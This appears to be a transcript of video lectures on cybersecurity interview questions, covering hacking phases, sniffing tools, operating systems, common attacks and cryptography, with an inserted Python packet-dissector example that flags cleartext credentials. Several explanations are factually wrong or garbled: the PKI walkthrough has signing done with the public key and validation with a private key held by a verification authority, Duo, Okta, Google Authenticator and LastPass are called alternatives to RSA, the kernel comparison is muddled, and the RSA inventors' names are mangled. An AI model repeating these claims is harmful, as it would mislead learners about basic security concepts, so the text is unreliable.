The next question is: what are the steps involved in hacking a server or a network? This is more of an ethical hacking question; you're looking at devices and the interviewer asks you what kind of steps are involved, what are the activities that you would do in hacking a server or a network. Now there are no specific steps that you would define, because every hack is going to be unique, but a hack can be classified into five different steps which are quite generic. The first step will always be the reconnaissance step, also known as the information gathering phase, also known as footprinting or fingerprinting, depending on what exactly you're doing. In this phase the attacker gathers all the evidence, all the information that is possible, about the targets that they want to attack. Here you are trying to get to know the victim so you can launch specific attacks towards them: you want to identify what operating system they are utilizing, what IP addresses and MAC addresses, the versions of the operating systems and applications, the patch levels; find out vulnerabilities, find out whatever information is possible, find out information about the person who's using those computers so you can launch social engineering attacks, and so on and so forth. So the first step is all about gathering enough information based on which you can launch further attacks. Once you have that information comes the second phase, which is known as the scanning phase. This is more of a technical phase. In the first step you've got your IP addresses, domain names, maybe even network maps, and you have identified which devices are available; now in the scanning phase you're going to identify live devices and then scan them for open ports, processes, protocols and services. You're going to identify vulnerabilities and enumerate them to identify more information, so at this point in time you will have identified a certain set of vulnerabilities or a certain set of security loopholes that you can misuse. Once you have identified those, you go to the next step, which is the gaining access phase. In this you're actually going to execute your attacks based on the vulnerabilities that you have found, and you are either going to gain access to that particular system by installing a Trojan, or destroy the system by installing a virus, or install spyware or a keylogger, whatever you wanted to achieve. So in the gaining access phase, based on the knowledge that you have gained in the first and the second phase, you're going to launch your attacks and try to gain access to that particular device. Then the next step is where you're going to maintain that access. Now that you have hacked into that device, it is not necessary that you will always be able to get access to it: suppose you have cracked the password of that particular user and the user changes that password after a few days; your attack is worthless. So what you're going to do here is maintain your access. This is where it is assumed that you want repeated access to that device, and thus you're going to install a keylogger or a Trojan or some mechanism which will still allow you to get access to that device without the knowledge or the authorization of that particular user. And finally, the last step is where you are going to cover your tracks. Whatever activity that you have done so far will have created logs and information based on which the victim will come to know that they have been compromised, and may be able to trace that activity back to you. So to prevent the victim from realizing that they have been hacked, and to prevent them from discovering who has hacked them, you want to cover your tracks by deleting logs and any references that point to that particular activity. You are going to hide the files that you have created: you have installed a Trojan or a keylogger, these will create files and directories, and you're going to hide them so that they are not discovered; you're going to hide processes that have been created; you're going to try to hide all the activity that you have done, so as to conceal the actual attack and prevent the user from realizing that they have been compromised. So these are the five steps that will be involved in hacking a server, network, application or any computing device you will come across.

The next question refers to: what are the various sniffing tools? This is a network-based attack where you are trying to capture data packets that have been transmitted over the network, and then you're going to analyze them to see if you can capture any sensitive information like usernames, passwords, bank details or anything of that sort. Now these tools will also depend on which operating system you are utilizing; for example, MSN Sniffer would work on Microsoft operating systems, Ettercap would be based on Linux, and so on and so forth. On the screen you'll see six different sniffing tools that work on different operating systems. Wireshark is something that is common to both Windows and Linux; it is used to analyze the network in detail, and it is the de facto tool that we will come across in most ethical hacking trainings and in most organizations when they want to do data captures. Now data capturing, or packet capturing, is not only done by hackers to gather more information, but is also a known troubleshooting technique used by administrators and network administrators to analyze any issues that may be going on in the network. So the first tool you see on the screen is Wireshark, which, as we stated, is available for Windows as well as Linux. Then there is tcpdump, which again has the same capability as Wireshark but is a command line version, whereas Wireshark also has a GUI, a graphical user interface; tcpdump is available on Linux. MSN Sniffer is a very old tool from when we had MSN Messenger; MSN Messenger is no longer there, but Microsoft does, or did, have a Microsoft Message Analyzer tool, which they stopped developing in 2015. That's another tool that is specific to Microsoft operating systems, from Microsoft, that can be installed to gather more information. Then you've got Ettercap, which is a tool to launch man-in-the-middle attacks and do data capturing, and is essentially a Linux command line based tool. Then dsniff is another password and network capturing tool which can help you capture data packets, predominantly a Linux tool.
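To make concrete what the sniffing tools listed above actually show, here is an added example (not code from the video or from any of the tools named): a minimal Ethernet/IPv4/TCP dissector that builds one constructed frame carrying a cleartext HTTP login, parses it the way tcpdump or Wireshark would, and runs a defender-side check that flags credentials crossing the wire unencrypted. All addresses, ports and the payload are constructed sample values; nothing touches a real network.

```python
"""What a sniffer sees on the wire: a minimal Ethernet/IPv4/TCP dissector.

Added example, not code from the video. It builds one constructed frame
carrying a cleartext HTTP login, parses it the way tcpdump or Wireshark
would, and runs a defender-side check that flags credentials crossing the
network unencrypted. No network I/O; everything is built in memory.
"""
import socket  # used only for inet_aton/inet_ntoa, no sockets are opened
import struct

ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
CLEARTEXT_LOGIN_PORTS = {21, 23, 80, 110, 143}  # FTP, Telnet, HTTP, POP3, IMAP

# Constructed sample payloads (hypothetical host, user and password).
LOGIN_POST = (b"POST /login HTTP/1.1\r\nHost: shop.example\r\n"
              b"Content-Type: application/x-www-form-urlencoded\r\n\r\n"
              b"username=anne&password=hunter2\r\n")
TLS_RECORD = bytes.fromhex("16030100050100000100")  # stand-in for an opaque TLS record


def ip_checksum(header: bytes) -> int:
    """RFC 791 one's-complement checksum; returns 0 when run over a header whose checksum field is valid."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_frame(src_ip: str, dst_ip: str, src_port: int, dst_port: int, payload: bytes) -> bytes:
    """Assemble Ethernet II + IPv4 (no options) + TCP (no options, PSH|ACK) + payload."""
    eth = bytes.fromhex("66778899aabb") + bytes.fromhex("001122334455") + struct.pack("!H", ETHERTYPE_IPV4)
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, 1000, 2000, 5 << 4, 0x18, 65535, 0, 0)
    total_len = 20 + len(tcp) + len(payload)
    ip_hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0x1234, 0x4000, 64, IPPROTO_TCP, 0,
                         socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip_hdr = ip_hdr[:10] + struct.pack("!H", ip_checksum(ip_hdr)) + ip_hdr[12:]  # fill checksum field
    return eth + ip_hdr + tcp + payload


def dissect(frame: bytes) -> dict:
    """Parse the three headers and return the fields a sniffer displays, plus the raw TCP payload."""
    if struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        raise ValueError("not an IPv4 frame")
    ip = frame[14:]
    ver_ihl, _tos, total_len, _id, _frag, ttl, proto, _csum, src, dst = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ip_checksum(ip[:ihl]) != 0:  # a corrupted header is rejected, as a real stack would
        raise ValueError("bad IPv4 header checksum")
    if proto != IPPROTO_TCP:
        raise ValueError("not TCP")
    tcp = ip[ihl:total_len]
    sport, dport, _seq, _ack, offset_byte, flags = struct.unpack("!HHIIBB", tcp[:14])
    data_offset = (offset_byte >> 4) * 4
    return {"src_ip": socket.inet_ntoa(src), "dst_ip": socket.inet_ntoa(dst),
            "src_port": sport, "dst_port": dport, "ttl": ttl, "flags": flags,
            "payload": tcp[data_offset:]}


def cleartext_credential_alert(info: dict) -> bool:
    """Defender-side rule: credential-looking data sent to a cleartext application port."""
    if info["dst_port"] not in CLEARTEXT_LOGIN_PORTS:
        return False
    body = info["payload"].lower()
    return any(marker in body for marker in (b"password=", b"passwd=", b"pass "))


def summarize(frame: bytes) -> str:
    """tcpdump-style one-line summary, with an alert suffix when the rule above fires."""
    info = dissect(frame)
    line = "IP %s.%d > %s.%d: %d bytes payload" % (info["src_ip"], info["src_port"],
                                                   info["dst_ip"], info["dst_port"], len(info["payload"]))
    return line + (" [ALERT: cleartext credentials]" if cleartext_credential_alert(info) else "")


if __name__ == "__main__":
    print(summarize(build_frame("10.0.0.5", "203.0.113.10", 51514, 80, LOGIN_POST)))
    print(summarize(build_frame("10.0.0.5", "203.0.113.10", 51515, 443, TLS_RECORD)))
```

The point a sniffer makes is visible in the first summary line: on port 80 the username and password are right there in the payload, while the same login over TLS on 443 yields only opaque record bytes, which is why the mitigation is encrypting the transport rather than trying to keep capture tools off the network.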
same with EtherApe this is a graphical tool which will allow you to capture data traffic and map protocols and identify which IP addresses have been communicating with what essentially all of the tools have similar functionality except that some have additional functionality like launching man in the middle attacks or having specific filters that will help you identify and troubleshoot some network issues that you may be facing moving on to the next question what is an operating system now this is a very difficult question to answer because normally when we want to answer this question we start off with the functionality of an operating system right we try to describe what Windows does or what Linux does or what Mac OS does and then we are trying to figure out what an operating system is in the first place but an operating system essentially as the slide says is a software program that provides a platform for computer hardware to communicate and operate with the computer software so it is basically an enabler for human interaction with the hardware that you have if you take the operating system out of the question it's just some hardware which cannot interact with you but essentially when you have an operating system like Microsoft Windows or Linux or Mac you're essentially installing an instruction set on that particular device which will allow you to interact with and manipulate the hardware to do whatever you want that hardware to do right essentially when we talk about drivers for your various devices like a driver for your LAN card or for your sound card or for your graphics card which allows you to tweak these cards for functionality right it allows us input and output functions for example the basic example you open up Microsoft Office products like Microsoft Word or Excel and you get a GUI on the screen which you can interact with you've got a keyboard and you type on that keyboard and the computer knows what you're typing
and reflects those actions on the screen by showcasing it on that particular Excel file or Word file so how does the computer know what to do or what you're exactly intending to do at this point in time it is all the operating system that is providing you all these services analyzing what your inputs are and then based on the programming it is going to execute that and show it to you on the screen right some of the most commonly used operating systems are Microsoft Windows you have them in desktop as well as server variants Unix Linux again Linux has desktop and server variants you've got Ubuntu Linux Mint Red Hat and so on so forth and then you've got Mac OS for Apple-related computers the next question what is the difference between micro kernel and macro kernel now the first thing we need to know is what is a kernel the kernel is the heart of the operating system that allows that input and output to happen it allows those drivers to be set up so that the hardware can interact with the software and we can then instruct the software and the hardware both to function in a particular manner so there are two types of kernels micro kernels and macro kernels micro kernel is something that we normally use micro kernels are for operating systems where the basic functionality is handled directly by the processor the micro kernel is very small in size the macro kernel is large because it basically is an entire image of the operating system the execution for a micro kernel is slow the macro kernel is going to be faster because it is more evolved there's a lot of programming involved extendability micro kernels are easy to extend macro kernels are hard to extend as far as security is concerned if a macro kernel crashes it takes everything down with it the entire operating system is going to crash but in case of a micro kernel it is only that particular process that is going to get affected macro kernel there is a lot of coding involved micro kernel less coding is involved examples of
micro kernels would be Symbian OS most popularly used on yesteryear phones like Nokia's if you remember those QNX and so on so forth macro kernels your Linux or BSD operating systems essentially use macro kernels next question what are the different types of operating systems so as you can see on the screen five types of operating systems batched OS distributed operating systems time sharing multi-programmed and real-time what are batched operating systems the computer operator places the jobs coming from input devices into batches so consider this not from a desktop perspective but from a server perspective where these devices are used by organizations to compute and to crunch some processes that are going to make some business sense out of it so when there are multiple processes coming in multiple jobs that are going to be scheduled a batched OS is going to place these jobs in batches and it is going to crunch those based on the inputs that have been given by these operators distributed OS is where there are multiple computers which are interconnected and are communicating through networks so in a corporate environment you don't use one single computer to do everything you've got a data center and the data center will have a cluster of servers where they are going to share some resources to match one particular task right so that's where your distributed OS comes into the picture then you have time sharing OS where you are renting some time so a time sharing OS minimizes the response time example in today's world the cloud right you go on to the cloud you have a virtual server over there you schedule a job over there it is executed and for that time being that operating system services your particular request and provides you that particular job any application that you see online that is executed for example Facebook from a consumer's perspective could be a time shared experience then multi-programmed OS the operating system uses
CPU scheduling to separate jobs so you're scheduling the CPU to complete certain jobs in this particular manner and in real time OS the operating system gives maximum time to critical operations so it identifies the priority of these operations it knows the high priority items the medium and low priority items and based on that it is going to execute these critical operations and get the job done moving on to the next question what is the difference between logical address space and physical address space now when you're looking at address spaces this is where applications come into the picture and when you execute an application it is going to create a particular address in the memory where it is going to create a buffer to store its own information so that it can be provided to the processor processed and then can be returned back to the application as an output right so as far as definitions are concerned a logical address is generated during running of an application or a program a physical address is a physical location on the memory module itself right visibility you can view a logical address because it is programmed into a computer so if I'm looking at C or C++ and I'm using malloc or memory allocation that's where the logical address is going to be created where a buffer is going to be created for that program and whatever the user input is going to be it's going to be stored in that buffer but where physical addresses are concerned this logical address will be created on a physical store or a physical memory module which will have its own addressing mechanism thus you can see the memory module but you cannot see the specific address on that particular memory module but as far as a logical address is concerned while you're programming or you're debugging the application it will show you the logical address that has been created the start point and the end point of the logical address that has been created for that
particular program it can be shown in a debugging environment right access logical and physical addresses the physical address as I just said is the memory module itself you can access only the physical address on that particular memory because logical addresses can be viewed but you cannot access them physically generation the logical addresses are generated by the CPU during the processing time whereas physical addresses are computed by the memory management unit or the MMU that you have on your computers and as far as logical addresses are concerned they are variable whereas the physical address is always going to be constant looking at the next question what is the difference between logical address space and physical address space so moving on from the previous question to this the logical address is an address created by the CPU for the processes that need to be addressed and that need to be stored as a buffer in the physical memory whereas the physical address itself is going to be an address that is going to be there on the physical part of that memory which is going to be assigned to it by the MMU well the next question discusses shells so what shells are used in Linux now what is the shell the shell is the command line interface that we utilize on a Linux machine so the terminal window as we call it is a shell and there are different variations of a shell based on what Linux operating system you're using the desktop operating systems that you use or the server operating systems and really in today's world the ones that you're going to use normally will always have a bash shell which is the first shell that you see on the screen known as the Bourne-again shell it is the default for Linux distributions so as far as end consumers regular consumers are concerned it is always going to be a bash shell a Bourne-again shell that you're going to utilize for scripting and to execute regular commands but when it comes to high level programming
or it comes to specialization tasks then you've got the rest of these shells that you can utilize for example the ksh known as the Korn shell is used for high level programming which supports associative arrays and built-in operations the csh or the C shell has different functionality like spelling corrections and job control the zsh or the Z shell provides unique features like filename generation and startup files and fish the friendly interactive shell provides features like auto suggestions and configuration so all of these have different functionalities depending on what usage you have for that particular shell the most common shell like I said is the bash shell that you'll always come across in your desktop Linux operating systems then looking at the next question what are the process states in Linux now what is a process a process is basically a service that is running for a particular application for that application to function right this process is going to direct user input to the processor process it get that output back to the application execute it and then show it on the graphical user interface for the user so in Linux there are five states for a process first is the ready state now in this state the process is created and it is ready to run so it is waiting for input it's ready the application is executed the running state is when the process is being executed itself blocked or wait is when user input is being looked for so it's waiting for user input so that it can do the processing completed or terminated it has completed its execution or was terminated by the operating system for some reason or the other so this is when the processing has been completed and then the last state is zombie where the process is terminated but the process table still holds the information maybe it is waiting for the kill request before it gets removed so these are the five states for a Linux process to be in and that
brings us to the 10 questions in the operating system and application space in the next video we'll be looking at 10 more questions on cyber attacks interview questions based on cyber attacks let's start off with the first one the first question is what is SQL injection SQL stands for structured query language which is a language that is used by most of your databases or your relational databases the variations of your database would be MySQL Microsoft SQL Oracle SQL you'll have IBM databases all of these databases utilize the structured query language to interact with the applications now all of these databases have their own syntax so you'll have to study most of these databases based on which applications and which databases you want to provide security for but as the name suggests SQL injection vulnerability or structured query language injection vulnerability is where a user can maliciously inject a SQL input or a SQL statement in a query and send it to the database and evoke a response out of it so this vulnerability is not specific to the database the vulnerability lies more in the application and the coding of that application so when the application receives a query which needs to be forwarded to the SQL database we need to configure at the application level what queries are allowed and what queries are not allowed so there are various aspects of how to manage a SQL injection vulnerability but the basic flaw lies in the application where unvalidated input is accepted and sent forward to the database where the database might confuse it into an executable statement and thus create a response that was not warranted there are various types of SQL injections as shown on the screen in-band SQL injection where you can look at an error-based or a union-based injection a blind SQL injection where it is either Boolean-based or a time-based attack and then an out-of-band SQL injection essentially you're looking at databases and
you're looking at application security however you want to encourage secure coding practices so that unvalidated input is mitigated the next question is what is spoofing now in spoofing you're basically assuming the identity of another person so here the attacker pretends to be some other person or an organization and sends you an email that appears to be a legitimate email it looks almost genuine it has been constructed to replicate what a genuine email would have been and it is very difficult to spot a fake one there are different ways to identify whether an email is genuine or not but that's for a different video moving on to the next question what is a distributed denial of service attack or a DDoS attack now generally a denial of service attack is an attack where legitimate users are prevented access to the resources that they legitimately can access right so for example if it is a bandwidth-based attack the attacker consumes the bandwidth of the network in such a way that there is no more bandwidth left for legitimate users to access the network now a single device may not be able to generate that much traffic to consume the bandwidth of a huge server thus the attacker will construct a botnet and through that botnet they will launch a distributed denial of service attack on the target victim right so a botnet there are two terms that you want to look at over here the first term is a bot and the second one being the botnet itself a bot is a software that once installed on a victim's machine allows the hacker to send remote commands to that machine that will make it generate some activity once we have enough machines on which such bots have been implanted the collection of these machines would be known as a botnet so an attacker would then instruct this entire botnet to start generating data traffic to be sent to the targeted network or to the targeted server which will then bog down the server thus crashing it and preventing users from
accessing that particular resource the next question is how to avoid ARP poisoning now first let's understand what ARP is ARP stands for address resolution protocol which is a protocol used by computers to communicate over the network once your computer boots up it starts a discovery process of identifying its neighbors so if I'm in a particular subnet my machine will proactively send out ARP requests address resolution protocol requests to find out which other machines are within the same network and which are live once it sends out a query a live machine will respond to that query along with its MAC address this information is then stored in what is known as an ARP table in the machine's cache so whenever my machine now wants to send out a packet to this particular machine it will go to the ARP table it will identify the IP address and the associated MAC address it will print that onto the data packet as the destination IP and destination MAC and send that packet across to the switch the switch will then identify the MAC address and send the packet to the relevant machine that is connected to that particular switch now to confuse the switch into sending it to a different machine an ARP poisoning attack is created this attack is generally launched to create a man in the middle attack now to prevent this ARP poisoning from happening in the first place there are three different aspects that we can utilize first we can use packet filtering which will filter out and block packets that have the same source address data so you have identified some malicious IP addresses and you want to block out some IP addresses so you're using a packet filter firewall where you have configured the firewall to filter out certain packets originating from a particular range of IP addresses this firewall and this technique will then block those kinds of packets coming in second keeping away from trust relationships organizations will develop protocols that do not
depend on trust relationships and thus you want to keep this protocol away from there once you have created a trust relationship these machines should not be sending out ARP requests to other machines in the first place since the trust relationship has been defined and these machines know whom to communicate with such kinds of protocols should then be disabled or you can use ARP spoofing software so there are software products out there that will look for ARP spoofing and prevent that from happening in the first place so if somebody has sent out a spoofed ARP packet that packet will be picked up by this software and it will be mitigated network visualizers like GlassWire and antiviruses like Sophos have inbuilt capabilities of identifying ARP spoofing attacks and mitigating them in the first place in the next question we are going to discuss what is ransomware now ransomware is a type of malware that blocks victims from accessing personal files and demands ransom to regain access there are three categories before we go into the categories let's just revisit what ransomware is let's start with the word malware malware is a malicious software that poses as a legitimate software but has a payload that will have a security impact on your machine so in this instance viruses Trojans all of these can be classified under malware so can ransomware a Trojan is a software that will give you backdoor access to a particular device a virus will do some destructive activity on that device a ransomware will basically encrypt the data of that particular user on that particular machine thus rendering that data inaccessible to the users themselves and in turn will demand ransom to provide access to that particular data so the three types of ransomware the first one is scareware which uses social engineering to cause anxiety or the perception of a threat to manipulate users into buying unwanted software so this preys on the gullibility
of humans where you can see a pop-up appearing on your screen which can scare you into believing that you may have been attacked or there is a virus on your machine and then instructs you to download a particular software to mitigate that particular virus now the malware will be in this software that you will be downloading and then a ransomware will be installed and your data will be encrypted screen lockers which lock users' computers by preventing them from logging in and displaying an official looking message you will see a screen once you boot up which prevents you from accessing the login page so it will not allow you to log into your own machine but it will give you a warning that your data has been encrypted and you need to connect to a particular email address and send Bitcoins over there to get a decryption key to access your own data and then the encrypting ransomware displays a message demanding payment in return for the private asymmetric key which is needed to decrypt the symmetric keys for the encrypted files so once your files have been encrypted you might just have a blank screen in front of you where you'll receive a warning message which instructs you to pay up a ransom in Bitcoins or in some cryptocurrency to some particular digital e-wallet which is not traceable and once you make that payment they will send you the decryption key and then you can access your data then talking about the next question what is the difference between an active and a passive cyber attack now when we talk about cyber attacks a cyber attack is an activity that is caused by a malicious user who wants to try to get access or cause some security incidents on the victim's devices so there are two ways that can happen it's either in an active manner or a passive manner in an active manner the
intruder attempts to disrupt a network's normalcy modifies data and tries to alter the system's resources so this is more active where the attacker will proactively try to destroy the network so that communications fail or they might try to modify the data where using a ransomware they can encrypt it or they might delete that data using a virus or steal the data using a Trojan or they might even alter the data so that it is no longer trustworthy whereas in a passive attack the intruder intercepts data traveling through a network here the intruder eavesdrops but does not modify the message so they're just listening in they're just observing what is going on they are not manipulating the data they are not stealing anything it's just that they are monitoring the activity that's going on then the next question what is a social engineering attack now a social engineering attack is a people-based attack the victim here is the human by itself the vulnerability also lies in the human it may be executed through a computer but at the end of the day it exploits the vulnerabilities of the human so it is the art of manipulating people so that they end up giving up confidential information now we always read in the papers where somebody got manipulated their passwords got hacked and somebody's life savings got wiped out right because they shared the OTP with someone or they shared the password with someone now creating a scenario where these people will fall prey to this attack and share this kind of personal information with unknown people that is where the social engineering attack comes in creating that scenario which will ensure that these people give out this confidential information now there are three categories in this attack the first one is a phishing attack second is a spear phishing attack and the third is a whaling attack now a phishing attack is basically a generic attack it is targeted to the world at large whoever falls prey to that attack will be a victim whereas a spear phishing
attack is a targeted attack towards a specific individual or a group of individuals or towards an organization so there is a lot more research that goes into spear phishing where you analyze the victim you try to figure out what their vulnerabilities are and you tailor make or you customize the attack to that particular vulnerability once you have that attack you launch it against those people those people will then fall prey to this attack and a whaling attack is where you're attacking top level executives so the C-level executives of an organization politicians movie stars wealthy and powerful people so any of these people when they're attacked it will be known as a whaling attack next question what is a man in the middle attack now this is something that we touched base on when we talked about ARP where the ARP poisoning attack needs to be executed to leverage a man in the middle attack now in the man in the middle attack the attacking computer takes the IP address of the client unaware of this the server continues to communicate with the attacker now if you remember in a previous question we have also talked about spoofing so in this scenario the attacker has spoofed their IP address to present themselves as a genuine client and now with that spoofing in mind they might either launch an ARP poisoning attack or just because of the spoofed IP address become a man in the middle that means that they are now eavesdropping on the conversation between the actual client and the server by imposing themselves as the server in this scenario the attacker is now a go-between between the client and the server and can eavesdrop and can copy the data if they want they can modify the data as well so as you can see on the screen the attacker becomes the man in the middle which means that they are now eavesdropping on the conversation that is happening between the client and the server the next question who are black hat hackers and white hat hackers the main thing is the
differentiation between a black hat hacker and a white hat hacker now black hat hackers are skilled individuals who illegally hack into a system the motive behind such an attack is mostly monetary gain these individuals are also known as security crackers now if you look at your criminal hackers those who have malicious intent those who do hacking for the intent of personal gain or for the matter of disruption the main thing that black hat hackers lack is authorization they are not authorized to do the activity that they are about to do and they are going to get unauthorized access to devices or to data which is going to cause losses to the organization involved whereas on the other side a white hat hacker also known as an ethical hacker these are the individuals who discover vulnerabilities in a computer network and they help the organizations mitigate these vulnerabilities they help the organizations defend themselves from black hat hackers so the main difference between these two types of hackers a black hat and a white hat is the intent and the authorization so black hat hackers will have malicious intent they will try to personally gain from that attack by finding your vulnerabilities they also will not have authorization to conduct whatever activity they are doing whereas on the other side white hat hackers will be hired by organizations they will provide authorization for certain activity that the white hat hacker can do to find out those vulnerabilities once those vulnerabilities have been found out by the white hat hacker they will report it to the management and guide them in implementing security controls to mitigate those vulnerabilities the main difference between a black hat and a white hat is the authorization and the intent the next question what are honeypots now honeypots are a very interesting device that can be introduced in a network these basically are decoy servers that are implemented in a network to attract the
attention of an attacker it is there to lure an attacker into attacking that particular device thus creating a security blanket for the rest of the devices so if an attacker has been able to bypass a firewall and is now trying to scan a particular network when they scan they will come across various devices that are there in the network they will then proceed to do a vulnerability scan on these devices the honeypot at that point in time will prove as an attraction to these attackers because it will demonstrate some vulnerabilities to the hacker which will divert their attention so these vulnerabilities are simulated on these devices they actually do not exist but the moment the attacker then starts interacting with the honeypot the honeypot will identify that as malicious traffic and will warn the administrator about a possible attack that is going on the administrator will then investigate through the honeypot what activity is going on and then reconfigure the security controls to block the attacker or mitigate the attack itself right so it is more of a decoy server that will showcase or simulate some vulnerabilities to an attacker thus to lure them and safeguard the rest of the network these are the 10 questions for cyber security in the next video we'll be talking about cryptography the first question define cryptography encryption and decryption now cryptography is used by security professionals to scramble data into a non-readable format which is used in securing that information so it involves converting data from a readable format into a non-readable format and then reversing it back to readable format again for example the word computer is now scrambled into looking like an unreadable format now if you look at this word that it has been scrambled into it would be very difficult for a human to figure out what the actual word was now in this scenario we have taken an algorithm where we have made a shift of the alphabet
where we have added two to the current letter so c plus 2 becomes e o plus 2 becomes q m plus 2 becomes o so we have done a shift of 2 and thus the key over here for this algorithm is the letter plus two so any person who figures that out will be able to unscramble this and convert this back into readable text the act of scrambling readable text data into something that is unreadable by using a particular key is what cryptography is all about now as we discussed the decryption again is replacing the letter and taking it further back by two characters so e minus 2 becomes c q minus 2 becomes o o minus 2 becomes m and so on so forth so anybody who knows this key the shift key will be able to decrypt this particular text so this depends on the user if I want to utilize letter plus five then the shifting of that character will be the fifth character from that particular character and so on so forth the next question what is the difference between ciphertext and clear text ciphertext refers to the text which is encrypted and totally unreadable the message received after decryption is known as clear text this text is comprehensible so the word computer is clear text that means that it has not been treated to any cryptographic measures it reads as it is intended to however the moment we encrypt it that means we scramble it into unreadable text by using any of the algorithms that we'll be looking at that text is known as ciphertext and without the key this becomes unreadable the clear text as discussed is the plain word that we have utilized we are using the English language in this instance so the plain word computer is the clear text once we add the encryption layer to it we get the ciphertext moving on to the next question what is a block cipher this refers to the method of encrypting the plain message block by block the plain message is broken down into fixed size blocks and then encrypted now a block cipher
is normally used for data that is stored so data that is stored on a hard disk and we want to encrypt that data that is known as block encryption or a block cipher so a block cipher is an algorithm that will allow you to encrypt data that is stored on a hard disk so in this example we've got plain text which is 64 bits in size and we have added a layer of encryption to it so plain text plus the key that we have studied in the previous questions and then the scrambled data out of it which is unreadable and thus encrypted then the next question what is public key infrastructure now the public key infrastructure is a set of policies which secures the communication between a server and a client it uses two cryptographic keys public and private so the infrastructure itself is a set of policies people procedures and techniques which are standardized in nature and are globally accepted which allow us to use digital certificates to encrypt data and decrypt the data at the other end we use asymmetric encryption over here which means that we use two keys one is a public key to encrypt and the private key to decrypt the other part of your encryption is symmetric encryption where the same key is used to encrypt and the same key is used to decrypt now in a public key infrastructure like I said we have standardized that so in the standardizing part of it these are the various players that have been defined in the public key infrastructure the first is the user or the sender in the scenario the one who requires this digital signature to digitally sign a particular transaction or a communication a registration authority with whom they are going to register for that particular key the certification authority who issues that key the verification authority who validates the key itself and the recipient who's going to be the other party of that particular transaction so how is this utilized a sender or the user who requires this digital signature will request or apply
for a digital signature with the registration Authority the registration Authority would validate the genuinity of the user so they might do some identity verification or uh proof of residence or something like that once they have identified the person and they have validated the information table then send the request to the certification Authority stating that the sender has been validated and we can and the certification Authority can issue the digital certificate to the particular user they will send the public key to the sender which will be utilized by the sender for further transactions so when the sender is going to sign some data and uh wants to send it across to the recipe and they will use the public key to sign it and send it across the recipient will then validate with the verification authority to see if the data the signed data is correct or not now why the certification Authority sends the public key to the sender the certification Authority updates the private key with the verification Authority so whatever is signed by the sender received by the recipient and they want to validate it they will send it back to the verification Authority the verification Authority will validate using the private key once the private key is validated it will then send the OK signal back to the recipient thus allowing the validation of that particular transaction if the signature is tampered with or is not the very fiction Authority is not able to validate the signature it will then send a denial message back to the recipient and the transaction will not go through so the PK enables trusted digital identities for people so the pki grants secure access to digital resources based on the infrastructure that has been created and the core of the pki is a certification Authority which ensures that the trustworthiness of the Digital Data is ensured so going back to the previous slide these are the key players that have been standardized in the public key infrastructure the 
certification Authority is the authority that issues the digital certificates the validation Authority is the one who validates that digital certificate moving on what is RSA RSA is one of the first public key crypto systems that is used for secure data transmission it stands for ravesh Shamir and Edelman now these are the three people who have created this algorithm rather West atishamir and Leonard Edelman who are the inventors of this technique it is a asymmetric cryptography algorithm which works on both public and private Keys hence the encryption key is public and the decryption key is kept private now as we have discussed earlier symmetric and asymmetric cryptography symmetric cryptography is where the same key is used to encrypt and decrypt whereas a symmetric cryptography is where there are two keys to encrypt and decrypt the algorithm what are the few alternatives to our essay now RSA is an algorithm that is used for encryption there are a lot of other algorithms that can be utilized to alter or do scramble data depending on your requirements so in the previous question we have studied and we have talked about what RSA is it stands for uh three creators of that particular algorithm but there are a lot of alternatives to this algorithm depending on how secure you want that data to be and some of them are listed here on your screen Duo security OCTA Google Authenticator and last cost LastPass is a password manager so is Duo security Google authenticate is something that we all utilize it is an application that you can download and store on our mobile devices and we can set that up to authenticate ourselves with certain portals so it issues a unique ID to us which once utilized will allow us access to those particular portals OCTA is an identity manager where you have created different digital identities and you have assigned them certain permissions and based on your authentication mechanisms OCTA will allow or disallow access to those different 
applications or different portals as you have configured it so all four or authorization authentication mechanisms which can be used as alternatives to RSA if getting your learning started is half the battle what if you could do that for free visit scale up by simply learn click on the link in the description to know more next question what are the prime objectives of modern cryptography and this is a very important question because we've we've so far looked at what cryptography is and what public key infrastructure is but what is the achievement out of it why are we utilizing it and what do we want to gain out of it so the main and the prime objectives of modern cryptography are as follows uh mentioned on your screen the first one is confidentiality the second one is non-repudiation third one is authenticity and the fourth one is integrity now if I go back to the first one confidentiality uh that is where I want to keep data confidential that means it will only be visible to the authorized users right so here I have created a list of people who have deemed as authorized users and have created a digital identity to them and have given access controls to those people now that is how confidentiality is insured so when we want to keep data confidential we create a list of users who we are going to allow access to certain resources and we are going to Define what access controls are to be utilized what access are allowed whether they've got an administrative access or user level access and only those authorized users are going to be able to access these resources that is how we maintain confidentiality the next one is non-repudiation non-reputation is the prevention of denial of having been a part of that particular transaction so in the public key infrastructure that we discussed where a digital signature was utilized to sign a particular transaction and then sent to the recipient the sender would not be able to deny of having originated the transaction because it was 
using their digital certificate thus non-reputation comes in the picture uh one more example that we can have here is on our mobile phones when we use SMS short messaging service and we send a message to uh to another person the person when they receive a message the number is validated by the service operator and thus the sender cannot deny having sent that message the sender at the same time can have a delivery report sent to them from that the message was delivered to the inbox of the recipient and thus if the recipient denies having received that message the delivery report becomes proof of having that message being delivered to their inbox thus both the parties cannot deny of have a of being a part of that particular transaction then comes the part of authenticity now in confidentiality we have created a digital identity assigned it to a particular person and we have given them digital signatures where they cannot deny having being a part of that transaction but authenticity is the part where they try to prove that they are who they claim to be so if I am claiming a digital identity I have to prove that I am that person who I'm Who I'm trying to claim to be and an example to that is when we go to our gmail.com websites it first asks us what is our username our username is normally our email address which identifies the account that we are trying to access right so this account is confidential because it is only authorized for a particular person and once they identify themselves by identifying the email address that's when the authentication part comes into the picture where it asks for the password now it has never ever happened that we just go on to the gmail.com type in a password and then it figures out which account we are talking about so the first step is always called the confidentiality part where we identify which account we are talking about and then we try to authenticate as the owner of that particular account by providing the appropriate password 
